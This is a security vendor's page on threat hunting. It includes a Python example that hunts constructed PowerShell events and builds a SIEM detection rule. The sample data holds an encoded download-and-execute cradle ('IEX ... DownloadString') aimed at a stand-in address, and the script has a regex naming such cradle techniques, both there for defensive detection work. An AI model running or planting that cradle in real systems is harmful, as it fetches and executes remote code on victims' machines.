Detecting threats in IT systems

Threat hunting

Put as simply as possible, Threat Hunting is a proactive search for threats within an organisation's infrastructure, intended to identify intrusions that the existing security systems have failed to detect. It consists in collecting historical and current data in order to spot signs of malicious behaviour early and to limit dwell time, that is, the period between an intruder gaining a foothold and being discovered. To a large extent, Threat Hunting depends on the analyst's skills and on up-to-date knowledge of the recent activity of criminal groups and of new attack methods, mostly sourced from the Threat Intelligence service we provide.

Threat Hunting is a creative process, but one that follows a defined framework:

  1. It starts with an idea (a hypothesis) drawn from intelligence (Threat Intelligence) and from the analyst's own findings, which is then…
  2. …investigated with the available tools and data…
  3. …in order to either disprove or uphold the hypothesis…
  4. …and so to implement more effective detection and monitoring in the Security Information and Event Management (SIEM) system, as well as to formulate new hypotheses for future hunts.
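The four steps above as a worked example, added here and not part of the original page or of the Cyber Arms service: a Python script that writes the hypothesis down first, runs it over constructed process-creation events (assumed telemetry, not real data), returns a verdict with the evidence, and turns an upheld hypothesis into a Sigma-style rule for the SIEM. The hypothesis text, host and user names, the 198.51.100.7 address and the rule fields are assumptions for illustration only.

```python
"""Hypothesis-driven hunt over constructed process-creation events.

Steps as on the page: (1) hypothesis -> (2) query the available data
-> (3) uphold or disprove -> (4) turn a confirmed finding into a SIEM rule.
"""
import base64
import re

# Step 1: the hypothesis, written down before any data is touched (assumed example).
HYPOTHESIS = {
    "id": "H-001",
    "statement": ("An adversary launches base64-encoded PowerShell from an Office "
                  "process to stage a download cradle, bypassing keyword-based SIEM rules."),
    "data_source": "process_creation",
}

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# PowerShell accepts any unique prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match every prefix, longest first, rather than the full spelling only.
_ENC_PREFIXES = "|".join("encodedcommand"[:n] for n in range(14, 0, -1))
ENC_FLAG = re.compile(r"(?:^|\s)-(?:%s)\s+([A-Za-z0-9+/=]+)" % _ENC_PREFIXES, re.IGNORECASE)
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression"
                    r"|\bIEX\b|FromBase64String", re.IGNORECASE)


def ps_encode(script):
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def ps_decode(blob):
    """Reverse ps_encode; return None for anything that is not valid encoded input."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample telemetry (not real data): one record per process start.
EVENTS = [
    {"host": "ws-017", "user": "jdoe", "parent": "explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"host": "srv-03", "user": "svc_backup", "parent": "cmd.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand "
                + ps_encode("Get-Service -Name Spooler | Restart-Service")},
    {"host": "ws-042", "user": "asmith", "parent": "winword.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -enc " + ps_encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')")},
]


def hunt(events, hypothesis=HYPOTHESIS):
    """Steps 2 and 3: query the data, return a verdict with evidence and leftover leads."""
    findings, leads = [], []
    for ev in events:
        if not ev["image"].lower().endswith("\\powershell.exe"):
            continue
        m = ENC_FLAG.search(ev["cmdline"])
        if not m:
            continue                                   # not encoded: out of scope
        decoded = ps_decode(m.group(1))
        if decoded is None:
            continue                                   # flag present but payload unreadable
        hits = sorted({h.lower() for h in CRADLE.findall(decoded)})
        record = {"host": ev["host"], "user": ev["user"], "parent": ev["parent"],
                  "decoded": decoded, "indicators": hits}
        if hits and ev["parent"].lower() in OFFICE_PARENTS:
            findings.append(record)                    # evidence for the hypothesis
        else:
            leads.append(record)                       # encoded but benign-looking: future hunt
    return {"hypothesis": hypothesis["id"],
            "verdict": "upheld" if findings else "disproved",
            "findings": findings, "leads": leads}


def to_sigma(result):
    """Step 4: turn an upheld hypothesis into a Sigma-style rule the SIEM can run."""
    if result["verdict"] != "upheld":
        return None
    return {
        "title": "Encoded PowerShell launched by an Office application",
        "status": "experimental",
        "logsource": {"category": "process_creation", "product": "windows"},
        "detection": {
            "selection": {
                "Image|endswith": "\\powershell.exe",
                "ParentImage|endswith": sorted("\\" + p for p in OFFICE_PARENTS),
                "CommandLine|re": ENC_FLAG.pattern,
            },
            "condition": "selection",
        },
        "falsepositives": ["Office add-ins running signed automation; tune on ParentImage"],
        "level": "high",
        "references": [result["hypothesis"]],
    }


if __name__ == "__main__":
    import json
    outcome = hunt(EVENTS)
    print(json.dumps(outcome, indent=2))
    print(json.dumps(to_sigma(outcome), indent=2))
```

Note the deliberate gap between the hunt and the rule it produces: the hunt can decode the payload and look inside it, but a process-creation rule in the SIEM only sees the raw command line, so the rule keys on the encoded flag plus an Office parent and is broader than the single finding. The encoded-but-benign `srv-03` event is kept as a lead, which is where the next hypothesis comes from.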

Threat Hunting presupposes that the organisation already runs an effective security monitoring process covering multiple areas, because it works from the data collected in a SIEM or a similar solution. It is a fully independent service, but it is most useful when integrated with the SOC service we provide, as the two complement each other.

Cyber Threat Hunting

Threat Hunting is team work, performed by the Cyber Arms analysts together with the Customer's engineers. Our goal is both to raise the organisation's level of security and to transfer know-how in both directions.
This ensures that, once the engagement is complete, further hunts can be carried on on-site by the Customer's own engineers and analysts, which gives far better results than any one-off service.